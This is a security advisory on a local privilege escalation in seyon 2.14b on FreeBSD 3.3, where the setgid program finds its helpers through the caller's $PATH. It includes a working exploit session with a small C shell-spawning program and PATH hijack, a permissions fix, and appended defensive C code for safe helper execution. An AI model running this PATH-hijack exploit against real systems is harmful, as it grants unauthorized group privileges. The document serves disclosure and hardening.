Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities in the bugtraq archives. I found that the exploit I had developed had already been discussed in May 1997. However, this does not change the fact that the current version of FreeBSD still ships a vulnerable version with vulnerable privs. I believe this is still worth noting. Here is my advisory as it was to be published before the previous vulnerability came to light.

OVERVIEW

A vulnerability exists in seyon v2.14b which will allow any user to upgrade his or her privs to those with which seyon runs.

BACKGROUND

This advisory is based entirely off the work I've done on FreeBSD 3.3-RELEASE and seyon 2.14b which is included on the FreeBSD installation CD as an "additional package". When installed via sysinstall, seyon's permissions are sgid "dialer". Different versions of seyon and different packages of 2.14b may have different default permissions.

DETAILS

Upon startup, seyon executes the programs "seyon-emu" and "xterm". The paths to these programs are not absolute and are gotten from the user's $PATH. By adding a directory we have write access to in our $PATH and putting our own version of seyon-emu or xterm, we can make seyon run this program with egid dialer.

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
  setregid(getegid(), getegid());
  system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$

FIX

Simply chmod 750 `which seyon` and add selected users to the "dialer" group.

Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier@usa.net
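
Added example (not part of the original advisory and not seyon's code): one way a setgid program can launch a helper without trusting the caller's $PATH, together with the check an auditor would run against a PATH value. HELPER_DIR, the function names, and the assumption that the helper does not itself need the dialer group are illustrative.

```c
/* Added example, not seyon's code. HELPER_DIR and all function names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define HELPER_DIR "/usr/X11R6/bin"  /* assumed root-owned install directory */

/* 1 if a PATH search could resolve a command from the current directory: an empty
 * entry or one not starting with '/'. Unset PATH is treated as unsafe too. */
int path_has_relative_entry(const char *path)
{
    if (path == NULL)
        return 1;
    for (const char *p = path;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (end == NULL)
            return 0;
        p = end + 1;
    }
}

/* Build HELPER_DIR/name; reject names that carry a path component. */
int helper_abs_path(const char *name, char *out, size_t outlen)
{
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;
    int n = snprintf(out, outlen, "%s/%s", HELPER_DIR, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Drop the setgid group, then exec the helper by absolute path (no PATH lookup). */
int exec_helper(const char *name, char *const argv[])
{
    char full[256];
    if (helper_abs_path(name, full, sizeof full) != 0)
        return -1;
    if (setregid(getgid(), getgid()) != 0)  /* real and effective gid := caller's gid */
        return -1;
    execv(full, argv);
    return -1;  /* reached only if execv failed */
}

int main(void)
{
    return printf("PATH has relative entry: %d\n", path_has_relative_entry(getenv("PATH"))) < 0;
}
```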